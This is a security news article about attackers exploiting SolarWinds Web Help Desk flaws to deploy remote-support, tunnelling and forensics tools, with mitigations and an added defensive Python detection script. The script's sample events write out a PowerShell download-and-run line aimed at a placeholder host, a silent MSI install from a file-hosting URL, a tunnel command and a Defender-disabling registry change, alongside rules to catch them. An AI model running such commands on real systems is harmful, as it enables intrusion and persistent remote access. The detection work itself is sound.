Hackers exploit SolarWinds WHD flaws to deploy DFIR tool in attacks

Researchers at Huntress have observed attackers exploiting vulnerabilities in SolarWinds Web Help Desk (WHD) and then deploying legitimate remote-support, tunnelling and forensics tools to gain and keep access to the compromised networks. The multi-stage intrusion chain is another instance of threat actors using trusted software to blend in while working their way into high-value targets.

The Anatomy of the Attack

Huntress believes the activity began on January 16, 2026, and has so far identified at least three targeted organizations. The multi-stage intrusion starts with exploitation of two SolarWinds WHD vulnerabilities, CVE-2025-40551 and CVE-2025-26399. Both are critical-severity flaws that allow remote code execution without authentication, and both have been flagged by the Cybersecurity and Infrastructure Security Agency (CISA) as actively exploited in the wild.

Initial Access and Tool Deployment

After gaining initial access, the attackers deploy a chain of tools to establish persistence and command-and-control (C2). The first is the Zoho ManageEngine Assist remote-support agent, installed from an MSI file fetched from the Catbox file-hosting service. The agent is configured for unattended access and tied to an anonymous Proton Mail account, giving the attackers hands-on-keyboard access that they use for Active Directory (AD) reconnaissance.

Next comes Velociraptor, a legitimate digital forensics and incident response (DFIR) tool that Cisco Talos recently warned is being abused in ransomware attacks. In this campaign it is repurposed as a C2 framework, with the client talking to attacker infrastructure hosted on Cloudflare Workers. Notably, the attackers use an outdated release, 0.73.4, which contains a privilege escalation flaw that they use to raise their permissions on the compromised host.

Persistence and Redundancy

For redundancy, the attackers also install Cloudflared, downloaded from Cloudflare's official GitHub repository, as a second tunnel-based channel for C2 traffic. In some cases they reinforce persistence further with a scheduled task named TPMProfiler that starts a QEMU-based SSH backdoor.

To keep later payload downloads from being blocked, the attackers disable Windows Defender and the Windows Firewall through registry modifications. Huntress observed a fresh copy of the VS Code binary being downloaded only seconds after Defender was turned off, which gives the attackers VS Code's built-in tunnel feature as yet another remote-access path.

The Broader Implications

This activity is not isolated. Microsoft security researchers have observed similar multi-stage intrusions against internet-exposed SolarWinds WHD instances, although Microsoft did not confirm that the two CVEs identified by Huntress were the ones exploited.

Abuse of legitimate tools such as Velociraptor and Zoho ManageEngine Assist is a growing concern. Built for incident response and remote support, they are expected in many environments and blend into normal administrative activity, so the presence of the binary alone is a weak signal and detection has to rest on how, from where and by whom the tool was installed and what it connects to.

Mitigation and Defense Strategies

System administrators are urged to act on these findings immediately. Key recommendations:

  1. Upgrade SolarWinds WHD: Update all instances to version 2026.1 or later, which patches both vulnerabilities.
  2. Restrict Access: Remove public internet access to the SolarWinds WHD admin interface to minimize exposure.
  3. Reset Credentials: Change all credentials associated with the SolarWinds WHD product to cut off access obtained through an exposed instance.
  4. Monitor for Indicators of Compromise (IoCs): Hunt with the Sigma rules and IoCs published by Huntress, which cover Zoho Assist, Velociraptor, Cloudflared and VS Code tunnel activity, silent MSI installations, and encoded PowerShell execution.
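To make the last recommendation concrete, here is an added example (my own code, not Huntress' published Sigma rules or IoCs, and not SolarWinds' or Microsoft's) of a small Sigma-style matcher run over constructed Windows telemetry. The events are shaped loosely like Sysmon process-creation (EventID 1) and registry value-set (EventID 13) records; every path, URL, token, task name and hostname in them is a placeholder and not an indicator from the campaign. The rules approximate the behaviours listed above (silent MSI from a URL, Velociraptor client, Cloudflared and VS Code tunnels, encoded PowerShell, Defender and firewall registry changes) and include a decoder for `-EncodedCommand` so a second-stage check can look at the script instead of opaque base64.

```python
"""Sigma-style matching of the tool deployment described above.

Added example, not code from Huntress, SolarWinds or Microsoft. EVENTS are
constructed records shaped like Sysmon process-creation (EventID 1) and
registry value-set (EventID 13) events; all paths, URLs, tokens and names
are placeholders, not indicators from the campaign.
"""
import base64
import re

# Encoded PowerShell is UTF-16LE text, base64-encoded; build one the way an
# attacker would so the sample event carries a realistic -enc argument.
_PS_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
_PS_ENCODED = base64.b64encode(_PS_PLAINTEXT.encode("utf-16le")).decode()

EVENTS = [  # constructed sample telemetry
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i https://files.catbox.moe/placeholder.msi /qn /norestart"},
    {"EventID": 1, "Image": r"C:\ProgramData\velociraptor.exe",
     "CommandLine": r"velociraptor.exe --config client.config.yaml client"},
    {"EventID": 1, "Image": r"C:\ProgramData\cloudflared.exe",
     "CommandLine": r"cloudflared.exe tunnel run --token PLACEHOLDER_TOKEN"},
    {"EventID": 1, "Image": r"C:\Users\Public\code.exe",
     "CommandLine": r"code.exe tunnel --accept-server-license-terms --name helpdesk"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_PS_ENCODED}"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "Details": "DWORD (0x00000001)"},
    # Benign noise: interactive install of a local package, no URL, no /q switch.
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\admin\Downloads\tool.msi"},
]

# Rules in Sigma's "Field|modifier: value(s)" shape. Every field in a
# selection must match; a list of values matches any of them, or all with "|all".
RULES = [
    {"title": "Silent MSI install from remote URL",
     "selection": {"EventID": 1, "Image|endswith": r"\msiexec.exe",
                   "CommandLine|contains|all": ["http", "/q"]}},
    {"title": "Velociraptor client launched",
     "selection": {"EventID": 1, "CommandLine|contains|all": ["velociraptor", "client"]}},
    {"title": "Cloudflared tunnel started",
     "selection": {"EventID": 1, "Image|endswith": r"\cloudflared.exe",
                   "CommandLine|contains": " tunnel"}},
    {"title": "VS Code tunnel started",
     "selection": {"EventID": 1, "Image|endswith": r"\code.exe",
                   "CommandLine|contains": " tunnel"}},
    # PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc,
    # ...), so match the prefix family rather than one spelling.
    {"title": "Encoded PowerShell command",
     "selection": {"EventID": 1, "Image|endswith": r"\powershell.exe",
                   "CommandLine|re": r"(?i)\s-e(c|n[a-z]*)?\s"}},
    {"title": "Defender disabled via policy registry value",
     "selection": {"EventID": 13, "Details|contains": "0x00000001",
                   "TargetObject|endswith": [r"\DisableAntiSpyware", r"\DisableRealtimeMonitoring"]}},
    {"title": "Windows Firewall disabled via registry value",
     "selection": {"EventID": 13, "Details|contains": "0x00000000",
                   "TargetObject|endswith": r"\EnableFirewall"}},
]


def _field_matches(event, key, expected):
    """Evaluate one 'Field|mod[|all]' entry against an event, case-insensitively."""
    name, *mods = key.split("|")
    actual = str(event.get(name, ""))
    mode = next((m for m in mods if m != "all"), "equals")

    def one(exp):
        a, e = actual.lower(), str(exp).lower()
        if mode == "contains":
            return e in a
        if mode == "endswith":
            return a.endswith(e)
        if mode == "re":
            return re.search(str(exp), actual) is not None
        return a == e

    results = [one(x) for x in (expected if isinstance(expected, list) else [expected])]
    return all(results) if "all" in mods else any(results)


def run_rules(events, rules):
    """Return (event_index, rule_title) for every rule that fires on an event."""
    return [(i, r["title"]) for i, ev in enumerate(events) for r in rules
            if all(_field_matches(ev, k, v) for k, v in r["selection"].items())]


def decode_encoded_powershell(command_line):
    """Decode the script behind -EncodedCommand (base64 of UTF-16LE), or None.

    Malformed base64 or a payload that is not UTF-16 is reported as None rather
    than raised, so a hunting loop keeps going over the remaining events.
    """
    m = re.search(r"(?i)\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    for idx, title in run_rules(EVENTS, RULES):
        print(f"event {idx}: {title}")
        if "PowerShell" in title:
            print("  decoded:", decode_encoded_powershell(EVENTS[idx]["CommandLine"]))
```

The benign seventh event shows why the MSI rule keys on a URL plus a quiet-install switch rather than on msiexec alone; in a real deployment the same rules would be fed from Sysmon or EDR exports, and the Velociraptor and tunnel rules would normally be paired with an allow-list of hosts where those tools are legitimately installed.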

Attribution and Targets

Neither Microsoft nor Huntress has attributed the attacks to a specific threat group, and the targeted organizations have not been named, although Microsoft has characterized the breached environments as "high-value assets."

Conclusion

The exploitation of SolarWinds WHD to deploy remote-support, tunnelling and DFIR tools is a reminder of how attackers now operate: an unpatched, internet-exposed application provides the foothold, and the tools brought in afterwards are the same ones administrators and responders use, which makes them hard to spot by name alone. Timely patching, removing public exposure of the admin interface, resetting credentials, and monitoring for the indicators above are the practical defenses.


Tags: SolarWinds, WHD, vulnerabilities, cyberattacks, DFIR tools, Velociraptor, Zoho ManageEngine, Cloudflare, CISA, Huntress Security, Microsoft, ransomware, incident response, cybersecurity, threat actors, privilege escalation, persistence, command-and-control, IoCs, Sigma rules, high-value assets, patching, monitoring, defense strategies.
